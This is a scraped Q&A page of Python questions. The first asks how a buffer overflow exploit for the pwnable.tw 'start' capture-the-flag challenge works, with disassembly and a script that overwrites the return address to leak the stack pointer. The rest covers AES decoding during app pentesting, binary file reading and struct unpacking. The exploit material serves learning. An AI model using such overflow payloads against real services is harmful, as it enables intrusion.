Exploiting system calls in assembly - python

I'm attempting to solve pwnable.tw's start challenge to learn a bit more about exploits. The provided dissassembled binary looks like this:
start: file format elf32-i386
Disassembly of section .text:
08048060 <_start>:
8048060: 54 push esp
8048061: 68 9d 80 04 08 push 0x804809d
8048066: 31 c0 xor eax,eax
8048068: 31 db xor ebx,ebx
804806a: 31 c9 xor ecx,ecx
804806c: 31 d2 xor edx,edx
804806e: 68 43 54 46 3a push 0x3a465443
8048073: 68 74 68 65 20 push 0x20656874
8048078: 68 61 72 74 20 push 0x20747261
804807d: 68 73 20 73 74 push 0x74732073
8048082: 68 4c 65 74 27 push 0x2774654c
8048087: 89 e1 mov ecx,esp ; buffer = $esp
8048089: b2 14 mov dl,0x14 ; count = 0x14 (20)
804808b: b3 01 mov bl,0x1 ; fd = 1 (stdout)
804808d: b0 04 mov al,0x4 ; system call = 4 (sys_write)
804808f: cd 80 int 0x80 ; call sys_write(1, $esp, 20)
8048091: 31 db xor ebx,ebx ; fd = 0 (stdin)
8048093: b2 3c mov dl,0x3c ; count = 0x36 (60)
8048095: b0 03 mov al,0x3 ; system call = 3 (sys_read)
8048097: cd 80 int 0x80 ; sys_read(0, ecx/$esp, 60)
8048099: 83 c4 14 add esp,0x14
804809c: c3 ret
0804809d <_exit>:
804809d: 5c pop esp
804809e: 31 c0 xor eax,eax
80480a0: 40 inc eax
Several writeups (1, 2, and 3) point out that the solution lies in leaking the esp address that was moved into ecx by exploiting the count values on sys_write and sys_read. This way, we can force the return address to 0x8048087 so that the program will loop and print the content of esp.
However, I do not understand how this really works. What exactly do the system calls do to registers and how does that change the return address? Why does the below exploit work?
from socket import *
from struct import *
c = socket(AF_INET, SOCK_STREAM)
c.connect(('chall.pwnable.tw', 10000))
# leak esp
c.send('x' * 20 + pack('<I', 0x08048087))
esp = unpack('<I', c.recv(0x100)[:4])[0]
print 'esp = {0:08x}'.format(esp)
I believe a step-by-step walkthrough that displays per-step register values could really help clarify the problem.

Related

Python Crypto AES 128 with PKCS7Padding different outputs from Swift vs Python

The output produced by crypto with following key
key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=') (16 bytes)
and the
message = "y_device=y_C9DB602E-0EB7-4FF4-831E-8DA8CEE0BBF5"
My IV object looks like this:
iv = base64.b64decode('AAAAAAAAAAAAAAAAAAAAAA==')
Objective C CCCrypt produces the following hash 4Mmg/BPgc2jDrGL+XRA3S1d8vm02LqTaibMewJ+9LLuE3mV92HjMvVs/OneUCLD4
It appears to be using AlgorithmAES128 uses PKCS7Padding with the key provided above.
I'm trying to implement the same crypto encode functionality to get an output like 4Mmg/BPgc2jDrGL+XRA3S1d8vm02LqTaibMewJ+9LLuE3mV92HjMvVs/OneUCLD4
This is what I've been able to put so far
from Crypto.Util.Padding import pad, unpad
from Crypto . Cipher import AES
class MyCrypt():
def __init__(self, key, iv):
self.key = key
self.iv = iv
self.mode = AES.MODE_CBC
def encrypt(self, text):
cryptor = AES.new(self.key, self.mode, self.iv)
length = 16
text = pad(text, 16)
self.ciphertext = cryptor.encrypt(text)
return self.ciphertext
key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=')
IV = base64.b64decode('AAAAAAAAAAAAAAAAAAAAAA==')
plainText = 'y_device=y_C9DB602E-0EB7-4FF4-831E-8DA8CEE0BBF5'.encode('utf-8')
crypto = MyCrypt(key, IV)
encrypt_data = crypto.encrypt(plainText)
encoder = base64.b64encode(encrypt_data)
print(encrypt_data, encoder)
This produces the following output Pi3yzpoVhax0Cul1VkYoyYCivZrEliTDBpDbqZ3dD1bwTUycstAF+MLSTIjSMiQj instead of 4Mmg/BPgc2jDrGL+XRA3S1d8vm02LqTaibMewJ+9LLuE3mV92HjMvVs/OneUCLD4
`
Which isn't my desired output.
should I not be using MODE_ECB, or am I using key as intended ?
To add more context
I'm naive to Crypto/ Objective C.
I'm currently pentesting an app, which does some hashing behind the scenes.
Using frida I'm tracing these function calls, and I see the following get populated for swift Objc calls.
CCCrypt(operation: 0x0, CCAlgorithm: 0x0, CCOptions: 0x1, keyBytes: 0x1051f8639, keyLength: 0x10, ivBuffer: 0x1051f8649, inBuffer: 0x2814bd890, inLength: 0x58, outBuffer: 0x16f1c5d90, outLength: 0x60, outCountPtr: 0x16f1c5e10)
Where
CCCrypt(operation: 0x0, CCAlgorithm: 0x0, CCOptions: 0x1, keyBytes: 0x1051f8639, keyLength: 0x10, ivBuffer: 0x1051f8649, inBuffer: 0x280e41530, inLength: 0x2f, outBuffer: 0x16f1c56c0, outLength: 0x30, outCountPtr: 0x16f1c5710)
In buffer:
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
280e41530 79 5f 64 65 76 69 63 65 3d 79 5f 43 39 44 42 36 y_device=y_C9DB6
280e41540 30 32 45 2d 30 45 42 37 2d 34 46 46 34 2d 38 33 02E-0EB7-4FF4-83
280e41550 31 45 2d 38 44 41 38 43 45 45 30 42 42 46 35 1E-8DA8CEE0BBF5
Key: 16 47
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
1051f8639 3f 2c 59 3b 7d 46 96 02 af 5a 6f b7 18 bc 92 cc ?,Y;}F...Zo.....
IV: 16
0 1 2 3 4 5 6 7 8 9 A B C D E F 0123456789ABCDEF
1051f8649 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
I use https://opensource.apple.com/source/CommonCrypto/CommonCrypto-36064/CommonCrypto/CommonCryptor.h to reference the type of encryption happening based on pointers i.e for Options argument the following is passed 0x1
key = base64.b64decode('PyxZO31GlgKvWm+3GLySzAAAAAAAAAAAAAAAAAAAAAA=') (16 bytes)
Nope, that's 32 bytes. It's true that only 16 are non-zero, making a really poor key, but if you pass 256 bits, you are doing AES-256, and you'll get a different result than you would from AES-128 using the first 128 bits of that key.
Your title mentions PKCS #7 padding, but it looks like your code is padding with zeros. That will change the results as well.
ECB doesn't use an IV. If you can see that the Swift code is using the IV, you might be able to see what mode it's using too, or you could try CBC as a first guess. ECB is insecure in most cases. Of course, using a fixed IV is also insecure.
Your output is longer than it should be (64 bytes instead of 48). Your attempt to do the padding yourself is probably responsible for this.
From <CommonCryptor.h>, we can decode the parameters used in Swift's call to CCCrypt:
Type
Value
Name
Comment
CCOperation
0x0
kCCEncrypt
Symmetric encryption.
CCAlgorithm
0x0
kCCAlgorithmAES128
Advanced Encryption Standard, 128-bit block
CCOptions
0x1
kCCOptionPKCS7Padding
Perform PKCS7 padding.
CCOptions
0x2
kCCOptionECBMode
Electronic Code Book Mode. Default is CBC.
CCOptions is a bit field, and kCCOptionECBMode is not set, so the default is used.
So this is AES-128 in CBC mode with PKCS #7 padding.

Difference in result while reading same file with node and python

I have been trying to read the contents of the genesis.block given in this file of the Node SDK in Hyperledger Fabric using Python. However, whenever I try to read the file with Python by using
data = open("twoorgs.genesis.block").read()
The value of the data variable is as follows:
>>> data
'\n'
With nodejs using fs.readFileSync() I obtain an instance of Buffer() for the same file.
var data = fs.readFileSync('./twoorgs.genesis.block');
The result is
> data
<Buffer 0a 22 1a 20 49 63 63 ac 9c 9f 3e 48 2c 2c 6b 48 2b 1f 8b 18 6f a9 db ac 45 07 29 ee c0 bf ac 34 99 9e c2 56 12 e1 84 01 0a dd 84 01 0a d9 84 01 0a 79 ... >
How can I read this file successfully using Python?
You file has a 1a in it. This is Ctrl-Z, which is an end of file on Windows.
So try binary mode like:
data = open("twoorgs.genesis.block", 'rb').read()

Python: convert hex bytestream to “int16"

So I'm working with incoming audio from Watson Text to Speech. I want to play the sound immediately when data arrives to Python with a websocket from nodeJS.
This is a example of data I'm sending with the websocket:
<Buffer e3 f8 28 f9 fa f9 5d fb 6c fc a6 fd 12 ff b3 00 b8 02 93 04 42 06 5b 07 e4 07 af 08 18 0a 95 0b 01 0d a2 0e a4 10 d7 12 f4 12 84 12 39 13 b0 12 3b 13 ... >
So the data arrives as a hex bytestream and I try to convert it to something that Sounddevice can read/play. (See documentation: The types 'float32', 'int32', 'int16', 'int8' and 'uint8' can be used for all streams and functions.) But how can I convert this?
I already tried something, but when I run my code I only hear some noise, nothing recognizable.
Here you can read some parts of my code:
def onMessage(self, payload, isBinary):
a = payload.encode('hex')
queue.put(a)
After I receive the bytesstream and convert to hex, I try to send the incoming bytestream to Sounddevice:
def stream_audio():
with sd.OutputStream(channels=1, samplerate=24000, dtype='int16', callback=callback):
sd.sleep(int(20 * 1000))
def callback(outdata, frames, time, status):
global reststuff, i, string
LENGTH = frames
while len(reststuff) < LENGTH:
a = queue.get()
reststuff += a
returnstring = reststuff[:LENGTH]
reststuff = reststuff[LENGTH:]
for char in returnstring:
i += 1
string += char
if i % 2 == 0:
print string
outdata[:] = int(string, 16)
string = ""
look at your stream of data:
e3 f8 28 f9 fa f9 5d fb 6c fc a6 fd 12 ff b3 00
b8 02 93 04 42 06 5b 07 e4 07 af 08 18 0a 95 0b
01 0d a2 0e a4 10 d7 12 f4 12 84 12 39 13 b0 12
3b 13
you see here that every two bytes the second one is starting with e/f/0/1 which means near zero (in two's complement).
So that's your most significant bytes, so your stream is little-endian!
you should consider that in your conversion.
If I have more data I would have tested but this is worth some miliseconds!

Write null bytes in a file instead of correct strings

I have a python script that process a data file :
out = open('result/process/'+name+'.res','w')
out.write("source,rssi,lqi,packetId,run,counter\n")
f = open('result/resultat0.res','r')
for ligne in [x for x in f if x != '']:
chaine = ligne.rstrip('\n')
tmp = chaine.split(',')
if (len(tmp) == 6 ):
out.write(','.join(tmp)+"\n")
f.close()
The complete code is here
I use this script on several computers and the behavior is not the same.
On the first computer, with python 2.6.6, the result is what I expect.
However, on the others (python 2.6.6, 3.3.2, 2.7.5) the write method of file object puts null bytes instead of the values I want during the most part of the processing. I get this result :
$ hexdump -C result/process/1.res
00000000 73 6f 75 72 63 65 2c 72 73 73 69 2c 6c 71 69 2c |source,rssi,lqi,|
00000010 70 61 63 6b 65 74 49 64 2c 72 75 6e 2c 63 6f 75 |packetId,run,cou|
00000020 6e 74 65 72 0a 00 00 00 00 00 00 00 00 00 00 00 |nter............|
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
*
0003a130 00 00 00 00 00 00 00 00 00 00 31 33 2c 36 35 2c |..........13,65,|
0003a140 31 34 2c 38 2c 39 38 2c 31 33 31 34 32 0a 31 32 |14,8,98,13142.12|
0003a150 2c 34 37 2c 31 37 2c 38 2c 39 38 2c 31 33 31 34 |,47,17,8,98,1314|
0003a160 33 0a 33 2c 34 35 2c 31 38 2c 38 2c 39 38 2c 31 |3.3,45,18,8,98,1|
0003a170 33 31 34 34 0a 31 31 2c 38 2c 32 33 2c 38 2c 39 |3144.11,8,23,8,9|
0003a180 38 2c 31 33 31 34 35 0a 39 2c 32 30 2c 32 32 2c |8,13145.9,20,22,|
Have you an idea how to resolve this problem please ?
With the following considerations:
In over a decade of programming python, I've never come across a compelling reason to use global. Pass arguments to functions instead.
For ensuring files are closed when finished with, use the with statement.
Here's an (untested) attempt at refactoring your code for sanity, assumes that you have enough memory available to hold all of the lines under a particular identifier.
If you have null bytes in your result files after this refactoring then we have reasonable basis to proceed with debugging.
import os
import re
from contextlib import closing
def list_files_to_process(directory='results'):
"""
Return a list of files from directory where the file extension is '.res',
case insensitive.
"""
results = []
for filename in os.listdir(directory):
filepath = os.path.join(directory,filename)
if os.path.isfile(filepath) and filename.lower().endswith('.res'):
results.append(filepath)
return results
def group_lines(sequence):
"""
Generator, process a sequence of lines, separated by a particular line.
Yields batches of lines along with the id from the separator.
"""
separator = re.compile('^A:(?P<id>\d+):$')
batch = []
batch_id = None
for line in sequence:
if not line: # Ignore blanks
continue
m = separator.match(line):
if m is not None:
if batch_id is not None or len(batch) > 0:
yield (batch_id,batch)
batch_id = m.group('id')
batch = []
else:
batch.append(line)
if batch_id is not None or len(batch) > 0:
yield (batch_id,batch)
def filename_for_results(batch_id,result_directory):
"""
Return an appropriate filename for a batch_id under the result directory
"""
return os.path.join(result_directory,"results-%s.res" % (batch_id,))
def open_result_file(filename,header="source,rssi,lqi,packetId,run,counter"):
"""
Return an open file object in append mode, having appended a header if
filename doesn't exist or is empty
"""
if os.path.exists(filename) and os.path.getsize(filename) > 0:
# No need to write header
return open(filename,'a')
else:
f = open(filename,'a')
f.write(header + '\n')
return f
def process_file(filename,result_directory='results/processed'):
"""
Open filename and process it's contents. Uses group_lines() to group
lines into different files based upon specific line acting as a
content separator.
"""
error_filename = filename_for_results('error',result_directory)
with open(filename,'r') as in_file, open(error_filename,'w') as error_out:
for batch_id, lines in group_lines(in_file):
if len(lines) == 0:
error_out.write("Received batch %r with 0 lines" % (batch_id,))
continue
out_filename = filename_for_results(batch_id,result_directory)
with closing(open_result_file(out_filename)) as out_file:
for line in lines:
if line.startswith('L') and line.endswith('E') and line.count(',') == 5:
line = line.lstrip('L').rstrip('E')
out_file.write(line + '\n')
else:
error_out.write("Unknown line, batch=%r: %r\n" %(batch_id,line))
if __name__ == '__main__':
files = list_files_to_process()
for filename in files:
print "Processing %s" % (filename,)
process_file(filename)

Python binary data reading

A urllib2 request receives binary response as below:
00 00 00 01 00 04 41 4D 54 44 00 00 00 00 02 41
97 33 33 41 99 5C 29 41 90 3D 71 41 91 D7 0A 47
0F C6 14 00 00 01 16 6A E0 68 80 41 93 B4 05 41
97 1E B8 41 90 7A E1 41 96 8F 57 46 E6 2E 80 00
00 01 16 7A 53 7C 80 FF FF
Its structure is:
DATA, TYPE, DESCRIPTION
00 00 00 01, 4 bytes, Symbol Count =1
00 04, 2 bytes, Symbol Length = 4
41 4D 54 44, 6 bytes, Symbol = AMTD
00, 1 byte, Error code = 0 (OK)
00 00 00 02, 4 bytes, Bar Count = 2
FIRST BAR
41 97 33 33, 4 bytes, Close = 18.90
41 99 5C 29, 4 bytes, High = 19.17
41 90 3D 71, 4 bytes, Low = 18.03
41 91 D7 0A, 4 bytes, Open = 18.23
47 0F C6 14, 4 bytes, Volume = 3,680,608
00 00 01 16 6A E0 68 80, 8 bytes, Timestamp = November 23,2007
SECOND BAR
41 93 B4 05, 4 bytes, Close = 18.4629
41 97 1E B8, 4 bytes, High = 18.89
41 90 7A E1, 4 bytes, Low = 18.06
41 96 8F 57, 4 bytes, Open = 18.82
46 E6 2E 80, 4 bytes, Volume = 2,946,325
00 00 01 16 7A 53 7C 80, 8 bytes, Timestamp = November 26,2007
TERMINATOR
FF FF, 2 bytes,
How to read binary data like this?
Thanks in advance.
Update:
I tried struct module on first 6 bytes with following code:
struct.unpack('ih', response.read(6))
(16777216, 1024)
But it should output (1, 4). I take a look at the manual but have no clue what was wrong.
So here's my best shot at interpreting the data you're giving...:
import datetime
import struct
class Printable(object):
specials = ()
def __str__(self):
resultlines = []
for pair in self.__dict__.items():
if pair[0] in self.specials: continue
resultlines.append('%10s %s' % pair)
return '\n'.join(resultlines)
head_fmt = '>IH6sBH'
head_struct = struct.Struct(head_fmt)
class Header(Printable):
specials = ('bars',)
def __init__(self, symbol_count, symbol_length,
symbol, error_code, bar_count):
self.__dict__.update(locals())
self.bars = []
del self.self
bar_fmt = '>5fQ'
bar_struct = struct.Struct(bar_fmt)
class Bar(Printable):
specials = ('header',)
def __init__(self, header, close, high, low,
open, volume, timestamp):
self.__dict__.update(locals())
self.header.bars.append(self)
del self.self
self.timestamp /= 1000.0
self.timestamp = datetime.date.fromtimestamp(self.timestamp)
def showdata(data):
terminator = '\xff' * 2
assert data[-2:] == terminator
head_data = head_struct.unpack(data[:head_struct.size])
try:
assert head_data[4] * bar_struct.size + head_struct.size == \
len(data) - len(terminator)
except AssertionError:
print 'data length is %d' % len(data)
print 'head struct size is %d' % head_struct.size
print 'bar struct size is %d' % bar_struct.size
print 'number of bars is %d' % head_data[4]
print 'head data:', head_data
print 'terminator:', terminator
print 'so, something is wrong, since',
print head_data[4] * bar_struct.size + head_struct.size, '!=',
print len(data) - len(terminator)
raise
head = Header(*head_data)
for i in range(head.bar_count):
bar_substr = data[head_struct.size + i * bar_struct.size:
head_struct.size + (i+1) * bar_struct.size]
bar_data = bar_struct.unpack(bar_substr)
Bar(head, *bar_data)
assert len(head.bars) == head.bar_count
print head
for i, x in enumerate(head.bars):
print 'Bar #%s' % i
print x
datas = '''
00 00 00 01 00 04 41 4D 54 44 00 00 00 00 02 41
97 33 33 41 99 5C 29 41 90 3D 71 41 91 D7 0A 47
0F C6 14 00 00 01 16 6A E0 68 80 41 93 B4 05 41
97 1E B8 41 90 7A E1 41 96 8F 57 46 E6 2E 80 00
00 01 16 7A 53 7C 80 FF FF
'''
data = ''.join(chr(int(x, 16)) for x in datas.split())
showdata(data)
this emits:
symbol_count 1
bar_count 2
symbol AMTD
error_code 0
symbol_length 4
Bar #0
volume 36806.078125
timestamp 2007-11-22
high 19.1700000763
low 18.0300006866
close 18.8999996185
open 18.2299995422
Bar #1
volume 29463.25
timestamp 2007-11-25
high 18.8899993896
low 18.0599994659
close 18.4629001617
open 18.8199901581
...which seems to be pretty close to what you want, net of some output formatting details. Hope this helps!-)
>>> data
'\x00\x00\x00\x01\x00\x04AMTD\x00\x00\x00\x00\x02A\x9733A\x99\\)A\x90=qA\x91\xd7\nG\x0f\xc6\x14\x00\x00\x01\x16j\xe0h\x80A\x93\xb4\x05A\x97\x1e\xb8A\x90z\xe1A\x96\x8fWF\xe6.\x80\x00\x00\x01\x16zS|\x80\xff\xff'
>>> from struct import unpack, calcsize
>>> scount, slength = unpack("!IH", data[:6])
>>> assert scount == 1
>>> symbol, error_code = unpack("!%dsb" % slength, data[6:6+slength+1])
>>> assert error_code == 0
>>> symbol
'AMTD'
>>> bar_count = unpack("!I", data[6+slength+1:6+slength+1+4])
>>> bar_count
(2,)
>>> bar_format = "!5fQ"
>>> from collections import namedtuple
>>> Bar = namedtuple("Bar", "Close High Low Open Volume Timestamp")
>>> b = Bar(*unpack(bar_format, data[6+slength+1+4:6+slength+1+4+calcsize(bar_format)]))
>>> b
Bar(Close=18.899999618530273, High=19.170000076293945, Low=18.030000686645508, Open=18.229999542236328, Volume=36806.078125, Timestamp=1195794000000L)
>>> import time
>>> time.ctime(b.Timestamp//1000)
'Fri Nov 23 08:00:00 2007'
>>> int(b.Volume*100 + 0.5)
3680608
>>> struct.unpack('ih', response.read(6))
(16777216, 1024)
You are unpacking big-endian data on a little-endian machine. Try this instead:
>>> struct.unpack('!IH', response.read(6))
(1L, 4)
This tells unpack to consider the data in network-order (big-endian). Also, the values of counts and lengths can not be negative, so you should should use the unsigned variants in your format string.
Take a look at the struct.unpack in the struct module.
Use pack/unpack functions from "struct" package. More info here http://docs.python.org/library/struct.html
Bye!
As it was already mentioned, struct is the module you need to use.
Please read its documentation to learn about byte ordering, etc.
In your example you need to do the following (as your data is big-endian and unsigned):
>>> import struct
>>> x = '\x00\x00\x00\x01\x00\x04'
>>> struct.unpack('>IH', x)
(1, 4)

Categories

Resources